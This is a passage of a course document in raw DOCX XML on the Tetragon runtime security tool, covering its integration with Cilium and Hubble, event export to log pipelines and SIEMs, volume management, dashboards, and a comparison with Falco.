        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">12.3.1 Shared Event Stream</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cilium's Hubble captures network events (flows, policy verdicts). Tetragon captures process and security events. Together: a complete picture of what's happening in your cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">12.3.2 Correlated Alerting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A Tetragon alert "suspicious process in pod X" combined with a Hubble alert "unusual outbound from pod X" is stronger signal than either alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">12.3.3 Identity Awareness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cilium assigns identities to pods based on labels (Module 4). Tetragon can use those same identities in policies — "block X for pods with identity Y."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">12.3.4 Unified CLI / UI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Isovalent's commercial enterprise offering unifies management of all three. Open-source users can manually integrate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">12.4 Hubble for Network, Tetragon for Host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A useful mental model:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HUBBLE watches the NETWORK. "Who's talking to whom?"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TETRAGON watches the HOST. "What's running? What's being accessed?"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Combined: full visibility into a cluster's runtime behavior. Attacks with a network component (C2, exfiltration) show up in Hubble. Attacks with a host component (privilege escalation, file tampering) show up in Tetragon. Most attacks have both.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">12.5 Isovalent Enterprise Story</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ISOVALENT ENTERPRISE (now under Cisco) bundles:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enterprise Cilium.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enterprise Tetragon (with additional features).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unified management UI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enterprise support.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compliance-focused features.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Priority security updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For organizations running both: the enterprise bundle simplifies operations. For organizations running open-source: both OSS projects are independently full-featured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">12.6 Ecosystem Adoption Curve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon's adoption trajectory is younger than Cilium's. Specific observations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon is typically DEPLOYED AFTER Cilium in Cilium-using organizations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Non-Cilium users discover Tetragon independently — often through its enforcement capabilities (the unique feature).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CNCF Incubating status (as of 2026) signals growing adoption but not yet fully mature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Falco remains the more widely-deployed runtime security tool due to detection-only simplicity.</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13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Observability and Event Export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.1 Tetragon as Observability Tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Even without enforcement, Tetragon is VALUABLE AS PURE OBSERVABILITY. It emits rich, correlated events about security-relevant activity. Many deployments use Tetragon primarily for observability — the enforcement capability is an option, not a requirement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">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80"/>
        <w:gridCol w:w="28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4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Observability strength</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Enforcement?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Falco</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Strong (mature rules, many integrations)</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Tetragon (obs only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Strong (especially process lineage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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(by choice)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Tetragon (enforcement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Strong + can block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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r>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.2 Event Output Formats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon emits events in multiple formats:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.2.1 JSON Log Files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Default. Events as JSON lines written to a file (or stdout):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ cat /var/log/tetragon/tetragon.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{"process_exec": {...}, "time": "..."}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{"process_kprobe": {...}, "time": "..."}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Standard format; consumable by any log aggregator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.2.2 gRPC Stream</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon exposes a gRPC API. Clients subscribe to event streams with filters:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># tetra CLI uses this</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ tetra getevents --pods webapp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Programmatic consumers use the gRPC API to integrate with custom tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.2.3 OpenTelemetry Export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon supports exporting events as OpenTelemetry logs/spans. Integrate with any OTel-compatible backend (Tempo, Honeycomb, Datadog, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.3 Fluentd / Fluent Bit Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Common pattern:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tetragon writes JSON logs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Fluent Bit DaemonSet tails the log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Fluent Bit parses JSON, adds pod metadata</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Fluent Bit forwards to Elasticsearch / Loki / SIEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reuses existing log pipelines. Tetragon events become searchable alongside application logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.4 SIEM Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most organizations route Tetragon events to their SIEM (Splunk, Sentinel, Elastic Security, etc.). Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon emits events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log shipper forwards to SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SIEM indexes, retains, enables search.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Correlation rules in SIEM combine Tetragon events with others.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alerts fire based on correlated signals.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The SIEM is where investigation happens. Tetragon's role is producing high-quality events; analysis lives downstream.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.5 Event Volume Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon can be NOISY. Every process exec, every relevant file access — these add up. Managing volume:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.5.1 Selective Policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Only write policies for events you care about. Don't observe "all file opens" unless you really need that.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.5.2 NoPost for Expected Behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Suppress events from known-good processes (Part 11).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.5.3 Downstream Filtering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If events get to SIEM, filter there. Discard routine events before retention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.5.4 Sampling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For very high-volume event types, sampling (1 in N events retained) reduces load while preserving statistical visibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13.6 Useful Grafana Dashboards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Standard dashboard patterns for Tetragon:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EVENT VOLUME OVER TIME — by type, namespace, policy. Trend spotting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TOP POLICIES BY MATCH COUNT — which policies are firing most?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BLOCKED ACTIONS — rate of enforcement blocks. Spike = attack or misbehaving workload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PROCESS ANCESTRY PATTERNS — unusual lineage chains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POLICY ENFORCEMENT MODE — which policies are observability vs. enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Cilium ecosystem publishes example dashboards; customize for your environment.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14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tetragon vs. Falco Deep Comparison</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14.1 Fundamental Differences</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 7 introduced the comparison; this module completes it from the Tetragon side. The differences are substantive.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Dimension</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Falco</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Tetragon</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Detection</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(strong, mature)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(strong)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Enforcement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NO (separate: Talon)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YES (built-in, kernel-level)</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Architecture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Userspace rule engine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Kernel-heavy with BPF LSM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Rules format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YAML with expression DSL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 CRDs (TracingPolicy)</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Ecosystem breadth</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wide (50+ downstreams)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Narrower (growing)</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CNCF maturity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Graduated (2024)</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Incubating</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Community size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large</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Growing (Cilium ecosystem)</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Deployment complexity</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Simpler</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Moderate (CRDs, BPF LSM)</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Kernel minimum</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4.14+ (varies)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5.7+ for enforcement</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Kubernetes-native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Partially (ConfigMaps)</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Deeply (CRDs)</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Docker-only Linux</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Good support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Limited focus</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Learning curve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YAML + expression DSL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CRDs + kernel hooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14.2 When Falco Is Better</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You want DETECTION ONLY. The blast-radius safety of not-enforcement is valuable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your ecosystem is Falco-aligned (existing rules, existing integrations).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You need the BROADEST downstream integration (Falcosidekick's 50+ targets).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your kernels are older (4.14 era).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your team has Falco expertise.</w:t>
      </w:r>
    </w:p>
    <w:p>
